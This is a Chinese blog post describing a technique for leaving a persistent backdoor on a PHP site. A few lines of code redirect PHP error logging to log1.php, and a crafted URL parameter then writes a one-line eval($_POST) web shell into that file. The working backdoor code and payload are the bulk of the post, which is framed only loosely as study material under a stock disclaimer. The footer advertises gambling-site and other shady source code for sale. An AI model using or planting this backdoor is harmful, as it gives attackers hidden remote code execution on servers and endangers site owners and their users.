情'Blog 文章列表: [首页] 第2页 第3页 第4页 第5页 第6页 [尾页]


PHP留后门又一法

发布日期: 2019-07-24     浏览次数:     文章作者: qing edit

思路呢来源于phpmyadmin,可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell,
PHP也是可以开户日志记录的。具体操作如下。
随便找个PHP文件,比如a.php,加上如下代码
<?php
error_reporting(E_ALL);
ini_set("log_errors", "On");
ini_set("error_log","log1.php");
$arr=array();
var_dump($arr[$_REQUEST['x']]);

?>


然后怎么用呢,直接提交
http://www.xxxx.com/a.php?x=<%3fphp+eval(%40%24_POST%5b%27a%27%5d)%3b+%3f>

OK。再根目录下就可以看到log1.php一句话木马文件了。

<< 留言评论 >>

本文:PHP留后门又一法,来自情'Blog

低价出售:六合彩,时时彩,股票T+0 现金皇冠网,等投注平台源码 另外出售:全讯网,足球比分,直播网,小姐威客网,同城交友 网狐棋牌整站带教程,充气娃娃销售下单源码 联系QQ:33089632

上一篇:盛达彩票源码17彩种 带数据库 采集器 下一篇:丰大顺源码+运营级别源码+完美开奖+新增视频开奖

点击这里给我发消息

      神刀网      雨路    iick     人生注入点    啊D  sh3llc0de  暗月

           免责申明:

本站开放的目的是收集各种Web漏洞资源,给予代码分析审计人员和脚本安全研究人员的一些学习资料或者参考资料!本网站提供的源码与平台或工具,仅为程序爱好者提供学习交流用,绝不能用做非法用途,任何情况下引触所属地区之法律,网友须自行承担责任,与本站无任何关系与法律风险,所以任何人不得将此用于非法途径!漏洞作者以及本站不承担任何风险!

Copyright© 2010-9999 情'Blog, all right reserved.